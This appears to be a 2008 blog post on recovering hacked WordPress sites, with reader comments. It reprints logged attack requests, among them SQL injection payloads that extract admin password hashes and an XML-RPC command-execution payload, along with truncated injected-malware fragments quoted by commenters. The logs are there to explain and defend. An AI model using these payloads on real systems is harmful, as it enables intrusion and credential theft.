Did your WordPress site get hacked?

Remember a few weeks ago there was all that noise about WordPress blogs getting hacked? Remember how everyone was urged to upgrade their blogs. You did upgrade didn’t you? No? It was inevitable that you’d be hacked. If you haven’t been hacked yet, it’s only a matter of time.

Unfortunately for some who did upgrade, it was too late. The hacker slimeballs may have known about the security issues before we did and went about their merry way breaking into blogs and websites, grabbing usernames and passwords, and planting backdoor scripts to log them in again at a later date.
That’s how even diligently upgraded blogs were hacked. The bad guys got there before you.

In the last week the hackers have started again. There is no zero day WordPress exploit. There is no evidence that version 2.5.1 of WordPress is vulnerable to any exploit at this time. They’re using the old exploits all over again. This time they’re redirecting hits from Google to your blog. Those hits are instead being redirected to your-needs.info and anyresult.net

If you’ve been hacked

  1. Upgrade to the latest version of WordPress.
  2. Make sure there are no backdoors or malicious code left on your system. This will be in the form of scripts left by the hacker, or modifications to existing files. Check your theme files too.
  3. Change your passwords after upgrading and make sure the hacker didn’t create another user.
  4. Edit your wp-config.php and change or create the SECRET_KEY definition. It should look like this, but do not use the same key or it won’t be very secret, will it?

    define(‘SECRET_KEY’, ‘1234567890’ );

Hidden Code

The bad guys are using a number of ways to hide their hacks:

  • The simplest way is hiding their code in your php scripts. If your blog directory and files are writable by the webserver then a hacker has free reign to plant their code anywhere they like. wp-blog-header.php seems to be one place. Theme files are another. When you upgrade WordPress your theme files won’t be overwritten so make sure you double check those files for any strange code that uses the eval() command, or base64_decode(). Here’s a code snippet taken from here:

    < ?php

    Another hack adds different code to your php files. Look for k1b0rg or keymachine.de in your php scripts and remove that offending code if you find it.

  • Check your .htaccess file in the root of you blog. If you’ve never edited it, it’ll should look like this:

    # BEGIN WordPress
    <ifmodule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </ifmodule>
    # END WordPress

    That file may have this chunk of code too which is to do with the uploader:

    <ifmodule mod_security.c>
    <files async-upload.php>
    SecFilterEngine Off
    SecFilterScanPOST Off
    </files>
    </ifmodule>

  • They’re also uploading PHP code disguised as jpeg files to your upload directory and adding those files to the activated plugins list. This makes it harder to find them, but not impossible:
    1. Open PHPMyAdmin and go to your blog’s options table and find the active_plugins record.
    2. Edit that record. It’s a long line. Scroll through it and you’ll find an entry that looks like ../uploads/2008/05/04/jhjyahjhnjnva.jpg. Remove that text, and make sure you remove the serialized array information for that array record. If that’s beyond you, just delete the active_plugins record and reactivate all your plugins again.
    3. Check your uploads directory for that jpg file and delete it.
    4. This Youtube video shows how to do that. I don’t think there’s any urgent need to remove the rss_* database record but it won’t hurt to do it.

Change Your Passwords

Once you’ve upgraded and verified that your install is clean again you must do the following:

  1. Change the passwords of all users on your system.
  2. Make sure the hacker hasn’t added another user account he can use to login again.

Stop the bad guys

One way of stopping the bad guys before they’ve done any major damage is by doing regular backups and installing an intrusion detection system (IDS).

  • I use Backuppc to backup all my servers every night, and a simple MySQL backup script to dump the database daily.
  • The first IDS that springs to mind is Tripwire but there are many others. I just installed AIDE to track changes on this server. What it does is give me a daily report on files that have changed in that period. If a hacker has changed a script or uploaded malicious code I’ll get an email within a day about it. It does take some fine tuning, but it’s easy to install on Debian systems (and presumably as easy on Ubuntu and Red Hat, and even Gentoo..):

    # apt-get install aide
    # vi /etc/aide/aide.conf.d/88_aide_web
    # /usr/sbin/aideinit

    In the configuration file above I put the following:

    /home/web/ Checksums
    !/home/www/logs/.*
    !/home/web/public_html/wp-content/cache/.*
    !/home/web/.*/htdocs/wp-content/cache/.*

    That will tell AIDE to track changes to my web server folders, but ignore the logs folder and cache folders.

Please Upgrade

There is absolutely no reason not to upgrade. WordPress is famous for it’s 5 minute install, but it takes time and effort to maintain it. If you don’t want the hassle of upgrading, or don’t know how to maintain it, why not get a hosted WordPress account at WordPress.com? Does the $10 you make from advertising every month really justify the time it takes to make sure your site, your writing, your photos and other media are safe? This isn’t an advert for WordPress.com, go with any blogging system you like, but don’t make life easy for the scum out there who’ll take over your out of date software and use it to their advantage.

Help a friend

Check the source code of the blogs you read. The version number in the header will quickly tell you if their version of WordPress is out of date or not. Please leave a comment encouraging them to upgrade! The version number looks like this:

<meta name=”generator” content=”WordPress 2.5.1″ /> <!– leave this for stats –>

What does a hack look like?

I perform logging on one of my test blogs and I come across all sorts of malicious attempts to break in. Attackers use dumb bots to do their bidding so a website will be hit with all sorts of attacks, even for software that’s not installed. The bots are so dumb they’ll even come back again and again performing the same attacks.

Here’s what I call the “ekibastos attack”. It happens over a number of requests and I’ve seen it come from 87.118.100.81 on a regular basis. It uses a user agent called, “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)” which strangely enough doesn’t show up on Google at all right now.

  1. First the attacker visits your Dashboard, and then without even checking if that was successful, he tries to access wp-admin/post.php several times using HEAD requests.
  2. Then he POSTs to wp-admin/admin-ajax.php with the following POST body:

    POST: Array
    (
    [cookie] => wordpressuser_c73ce9557defbe87cea780be67f9ae1f=xyz%27; wordpresspass_c73ce9557defbe87cea780be67f9ae1f=132;
    )

  3. When that fails, he grabs xmlrpc.php.
  4. He then POSTs to that script, exploiting an old and long fixed bug. Here’s a snippet of the data.

    HTTP_RAW_POST_DATA: <?xml version=”1.0″?>

    <methodCall>

    <methodName>system.multicall</methodName>

    <params>

    <param><value><array><data>

    <value><struct>

    <member><name>methodName</name><value><string>pingback.extensions.getPingbacks</string></value></member>

    <member><name>params</name><value><array><data>

    <value><string>http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10048,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*</string></value>

    </data></array></value></member></blockquote>

  5. That fails too so the query is repeated with similar SQL.

    <value><string>http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10000%2Bord(substring(user_pass,1,1)),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*</string></value>

  6. Then he tries a trackback:

    URL: /wp-trackback.php?tb_id=1
    POST: Array
    (
    [title] => 1
    [url] => 1
    [blog_name] => 1
    [tb_id] => 666666\’
    [1740009377] => 1
    [496546471] => 1
    )

  7. And another trackback:

    URL: /wp-trackback.php?p=1
    POST: Array
    (
    [url] => ekibastos
    [title] => ekibastos
    [excerpt] => ekibastos
    [blog_name] => +AFw-\’)/*
    [charset] => UTF-7
    )

  8. Before finally going back to xmlrpc.php with this POST request:

    <?xml version=”1.0″?>
    <methodCall>
    <methodName>pingback.ping</methodName>
    <params>
    <param><value><string>k1b0rg’ icq: 76-86-20</string></value></param>
    <param><value><string>http://ocaoimh.ie/?p=k1b0rg#ls</string></value></param>
    <param><value><string>admin</string></value></param>
    </params>
    </methodCall>

  9. In between, he also tries the following GET requests:

    GET /index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1
    GET /index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.1

  10. Thankfully I upgraded and all those attacks fail.

Those requests have been hitting me for months now with the latest happening 2 days ago. If that doesn’t convince you that you must upgrade and check your website, I don’t know what will.

PS. For completeness, here’s another common XMLRPC attack I see all the time. Ironically, this actually hit my server from 189.3.105.2 after I published this post.

<?xml version="1.0"?>

<methodCall>

<methodName>test.method

</methodName>

<params>

<param>

<value><name>','')); echo

'______BEGIN______';

passthru('id');

echo

'_____FIM_____';

exit;/*</name></value>

</param>

</params>

</methodCall>

Edit: Tripwire url fixed, thanks Callum

PS. If your site has been hacked, try the WordPress Exploit Scanner which will try to find any modified files and suspicious database records.

Comments

comments

387 Replies to “Did your WordPress site get hacked?”

  1. Hi there :)) Looking desperatetly for help 🙂 I cannot even get into my blog b/c the worm or whatever has deleted my admin user and now all my posts are gone etc. How do I even get back into my blog to delete the hacker user and start to clean up. Do I do this from FTP? Do I upgrade first? And where exactly do I look for these codes (through my cpanel) or do I go into my blog admin and look at code there? I have a prophoto2 theme blog. Thank you so much. I am worried that the virus will not stop and eat up my whole blog – it is still there for now with header etc, just no posts. Can you please help me?? I’d be so grateful. Thank you :))

  2. My wordpress blog was hacked too, my permalink structure was default but it changed to a funky one when it was hacked by this worm, and a pretty simple fix is to to click the default permalink structure again and click save changes, now your posts should be working again, mine start working again.

    I admit, i had to upgrade my blog for many months, but i am too lazy for some things sometimes, but not anymore, now i got smarter, way smarter to be hacked again.

  3. Thank you for all these useful informations. Unfortunately it`s a matter of time until a WordPress blog will be attacked by hackers, in a form or other. The main rule is a constantly DB backup. Upgrade your WP and the plugins when it`s possible, try to protect as much you can, in this article you can find useful details, but don`t forget, secure your important dates by regular backups.

  4. For the sake of helping of course, i want to say something else.

    When i was hacked, i mentioned that my permalink structure was hacked, it was literally changed to a very complex one, fortunately it was not working in terms of real and active links, i guess the hacker who wrote the worm did not want to make damage, real and extensive damage i mean, i guess he wanted only to scare people into upgrading your wordpress blog which makes me think a lot, i mean, who would want to scare every wordpress blog user in to upgrading to the latest patch!!!?

    But the permalink structure hacked was not all, my theme files were hacked too, my footer php file was hacked, they inserted a large number of links to spam stuff, which by the way, really damaged my google search engine position and perhaps even my page rank position too, in the long run of course, and that happened because the guy used a very common flaw everyone does, and wordpress has fault on that, i explain in the next paragraph.

    If you go to the theme editor in the appereance menu, you know or you should know that you can edit your theme files or any other file from your wordpress installation on your wordpress control panel appearance online editor, and for that, you must first change mod the file permissions of the files you want to edit, i mean, change to be writable so that the online wordpress file editor can edit, but that is a major flaw because nobody will change mode the files permissions again to what value they were with, and with a XSS attack or some xmlrpc trackback attack method, hackers could create worms or just pieces of code to insert malware code in to the files you just change permissions to writable.

    Another flaw people still use in wordpress blogs and others is the XMLRPC protocol, that must be deleted from blogs, it is so insecure that it is just another flaw that hackers use to hack or deface a wordpress blog, so the main patch is for you to delete the xmlrpc.php file from your wordpress root installation directory, beleave me, i really informed myself on this, delete it and deactive the service by going to the wordpress control panel, then in general options in some menu i can not recall the name, just browse through all and set it off, you do not need that.

    Hope i helped.

  5. Several of my sites were exploited some a hacker recently. As far as I am aware the hack used the wordpress php vunrability to gain access to my server and rather than creating havoc with wordpess files appears to have defaced one of my html sites by deleting the home page and uploading his or hers own stupid home page. So, in this case they used wordpress to gain entry but did not do anything only deface an unrelated non wordpress site. Upgraded wordpress, all plugins and installed a firewall which seems to be doing its job of blocking further attacks given the emails I get from them once a week stating I have again fallen victim! changed all passwords, ftp,admin,sql and any other I could think off! it really is not nice being hacked and is a real pain in the rear so ensure you back up often and install a firewall – if you have one they will simply move on to another blog which does not so its a good deterrent.

  6. As a JustHost user I installed WordPress (previous version) as first time user, via cPanel – Fantastico.

    Everything worked well, upgraded immediately for WP 2.8.4 security upgrade via WP Dashboard, which subsequently displayed WordPress 2.8.4.

    Henceforth, I thought I was running with WP 2.8.4.

    That is, until yesterday!

    cPanel – Fantastico | WordPress

    displayed in RED upgrade now to WP 2.8.4

    Shock horror!

    Install by Fantastico and it controls WordPress.

    Upgrades by WP WordPress do not update.

    Warning:

    WordPress upgrades – immediate.

    Fantastic WP upgrades – timing delay, therefore, security risk.

    My site been hacked.

  7. My site and blog were also hacked by the latest wordpress worm. It’s important to also look in your sql database, particularly in the wp_users category: if you’re the only admin, there should only be records that pertain to you (tagged with “1”); all others should be deleted. Also check the users meta data: this is where I found a JS file that contained hidden redirect code. Another place is the “uploads” folder: you may find a cached javascript file that shouldn’t be there, or a tinymce.gz file: delete both. Check your blog/database daily after you install a clean copy to make sure it stays clean.

    1. THank you so much for this article. I’ve recently been hacked with HIDDEN Spam links in my header.
      I did find a bunch of ‘fake’ users in my Users file in myPHPadmin and deleted them.
      Then i changed my WP name/password.
      But the links came back a week later.
      Now i see a bunch of suspicious stuff in my Users Metadata file in myphpadmin.
      ROSACEA:
      How do i know what is safe to delete??
      I feel like I am flying blind.

      Any other tips will be appreciated.

        1. Hi Donncha-
          Thank you SO much for replying to me. SO even though i keep deleting these hidden links from my header.php and then re upload the original header.php and i’ve changed usernames and passwords for both WP and Blue host…the hidden links keep returning!!!

          I’ve also deleted fake users and some odd user metadata.
          Now, i ran your Exploit Plug in and this:
          <?php eval(gzinflate(base64_decode('1VVtT9swEP7c/…
          …plus a bunch of script comes up in what appears to be every plug in.

          It also found so many other things: (eval…display: none;…<iframe)…String.fromCharCode) i don't know what's okay and what is not. I am no expert. Please help. What do i do next? Thank you so much!!
          Lisa

  8. Site was hacked yesterday…..
    The code at the bottom of this reply was added to several php files and script.js files.
    I searched through all the files that were added at that time and copied some files from original wordpress installation to make the site work again.
    I hope it is all clean now but know I have to do more to prevent this from happening again.

    I am so annoyed that there are idiots spoiling peoples fun of setting up a website!

    Thanks for the tips mentioned above it helped me getting the site back up and running, but still trying to find better security to prevent this from happening again.

    Any tips are welcome!

    /*GNU GPL*/ try{window.onload = function(){var X08yhffhg7xkxf = document.createElement(‘script’);X08yhffhg7xkxf.setAttribute(‘type’, ‘text/javascript’);X08yhffhg7xkxf.setAttribute(‘id’, ‘myscript1’);X08yhffhg7xkxf…. etcetr you get the point

    1. Thanks, this script is brilliant. Still getting hacked regularly so I haven’t solved the underlaying problem but by running your script teh site is up most of the time, I am setting up a new site ,with all new usernames and passwords.
      Had to reinstall my pc as well because it got infected 🙁

  9. My wordpress account was hacked, and I am trying to erase links that have been embedded to my site. I recently upgraded to the latest version of wordpress, changed my passwords, etc. Is there a way to edit my html to delete these embedded links? Here is my website: liisainvermont.com

    1. Ed – didn’t you read the entire article?

      It says upgrade wordpress and check for files that might be corrupt or changed from original. Also check all the folders you set write rights to.

      I would do it with next steps:
      1. backup entire mySql database to local computer
      2. delete mySql database and create new mySql database
      3. restore tbles from local backup
      4. check tables for users and change passwords (hacker might have old passwords)
      5. create clean install od latest wordpress
      6. upgrade data in mysql as needed

      Hope this helps…

      1. I’m still not clear on this… if I delete the DB then upload the one I backe up, won’t it contain the fake users still?

  10. like many ive had not only a wordpress site hacked but then my server and not for the first time. yes i backup but thats not the point.

    its come to a point were i changes hosts which took time and money

    1. Mikko – and sometimes the “regular guy” isn’t willing to learn how to administer a website and be responsible for it. Sounds harsh I know but you wouldn’t drive a car without getting some lessons first would you?

  11. Hi Donncha, I don’t know if I’m being hacked or not, but I keep finding a new user in my list of users. They are calling themselves admin, but with no role assigned. He/she/it has made several draft posts. I am using wp2.9.1. Any ideas?

  12. Thanks so much for the advice it came in very handy.

    In my case it was in the header and was one very long line of code that seemed like it was just numbers and would be harmless, but it was the problem.

    It blocked me..

    1. I couldn’t perform from Firefox a simple view source code
    2. Even with “NoScript” on full alert
    3. Every time I would try, it would try to give me a Trojan.
    4. FTPing the header file and attempting to view the local file with notepad also prompted an a/v alert.
    5. I ended up using CPanel’s internal file editor to review the malicious code and remove it.

    Thanks again so much for your help.

  13. Donncha,
    I loved the write-up above and will try it , especially the plugin to see what’s wrong with my site. The site works but the RSS feed http://feeds.feedburner.com/indimag is fried. I get the following :

    Warning: session_start() [function.session-start]: open(/home/39725/data/tmp/sess_a694ffa38088c1954d4fcf657b2f0c54, O_RDWR) failed: Disk quota exceeded (122) in /nfs/c02/h08/mnt/39725/domains/indimag.com/html/wp-content/plugins/wordpress-automatic-upgrade/wordpress-automatic-upgrade.php on line 121

    I would greatly greatly appreciate your/any other commenter’s thoughts on the issue.

    Peace,
    Madhu
    INDIMAG.com

    1. “Disk quota exceeded” – your disk is full.

      Also, it looks like your website is on an NFS drive which is bad for caching. You should cache to a local drive.

      1. Donncha,
        I know of the NSF but to get local it’s costs and I’m living with it.

        On the disk being full , per the disk usage report I can see I’m using just 2-3 % of my total available disk space — non dedicated , shared , but more than 9 GB free and usage is in MBs only as of now…

  14. Hi Donnoha,
    You’ve given really great information here and I will definitely apply it. I only have one problem: cant even get into the back end of my blog!! Do you have any suggestions?

    When i try to go in with firefox, my antivirus comes up with the Mal/iframe-f If i try to go in with IE it doesnt let me even get near the blog front end or backend.

    once i log in with firefox – everything goes to a white screen and hangs. Had googled and tried to find out what to do but your information is more extensive. do you ever do paid work?

    (coz I am at my wits end and i dont have enough knowledge of php to know what to delete and what not to)

    i have upgraded, added exploit, have manually looked through files for obvious iframes (didnt look for the rest of the code you’ve revealed here though).
    have downloaded, scanned for malware with 5 different programs, have deleted users, changed passwords, and stood on my head with this thing !!!

    any advice is appreciated

    Please let me know about the paid thing

    Thanks
    Gaylea

  15. I wanted to mention a couple of plugins that can really help keep your blog protected, especially to all you non-coding webmasters…

    One is called WordPress Firewall. It basically protects your WordPress software from attempts to login, hack passwords or use the query strings to inject code or look for weaknesses. Pro’s: Closes another door or two in the face of hackers. Con’s: Have to ensure your current IP address is listed so you can edit your blog. (Check out whatismyip.com to find it)

    Another is WordPress Antivirus. This basically scans your theme files for injected type code. Tho not full proof, it does add another layer of possible protection.

    I also use WordPress Scanner to scan my installation for security holes.

    Just Google any of these names and the word “wordpress” or “plugin” at the same time.

    And remember, the safety of your blog and your visitors is in your hands… get proactive.

  16. I use WPMU and Love WordPress !! I Had 13 sites totaling 4000+ “Real”members,and with in a few hours I had 10,000+Fake members all mixed in !And no sites ! most of the Fake blogs and user emails I noticed (later) were short first name sounding and all had numbers ending that short name, like saally272645343 had matching emails like saally272645343@whateverfake.com
    I Also found a theme with files all cute and pretty :{ with images labeled as alott of the codes you mention above, theme was named flavour-extended-png in the themes folder, I am almost sure it is infected.Thank you for all the help wordpress world 🙂

    Keep the Faith 🙂

  17. Ok First up.

    1. I have 5 wordpress sites all got hacked into during March. The first one http://www.vincecianci.com is reported as an attack site and supposedly has malware on it. The google message appears upon trying to load the site. The same thing has happened on my other sites too.

    2. I cant access ANY of my sites though the standard wordpress login page as If my own passwords have been changed.

    3. I am not tech savy at all. I checked most of my files on each of the 5 wordpress sites and it appears ok to me but what do I know. I have zero php, ftp experience. My hosting provider GoDaddy cant do anything so I feel I am out of options.

    Any ideas here guys??

    Vince.

  18. The following is a common hack, but I can not seem to find the common fix.

    .:: HACKED By R3YR3 ::. | r3yr3[dot]m4iL[at]gmail[dot]com |

  19. If a person’s site is still being hacked, till you can find another way to keep them out, you should be the only one going in and only from home – one place. Do google searches and learn about htaccess files. then, if possible, make use of them.

    To keep everyone but you out of admin, make sure no one but you knows your FTP password. Change it before you do anything else, and again afterwards. Several ftp id’s and pw’s can be created by a hacker once he is in. Go to your cPanel (?) and make sure that there are none created that you do not know about – probably none. period. If a hacker can get in with ftp, they can shoot down your htaccess file also.

  20. My site was hacked today. I have this code:

    <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9");

    at the top of all of my PHP files.

    I think I need to do a complete re-install. I don't have the WordPress folder backed up, but I do have a clean back of my database. So, can I just delete my current installation and database, install a new wordpress and then restore the database? Or is it more complicated?

    Thanks

Leave a Reply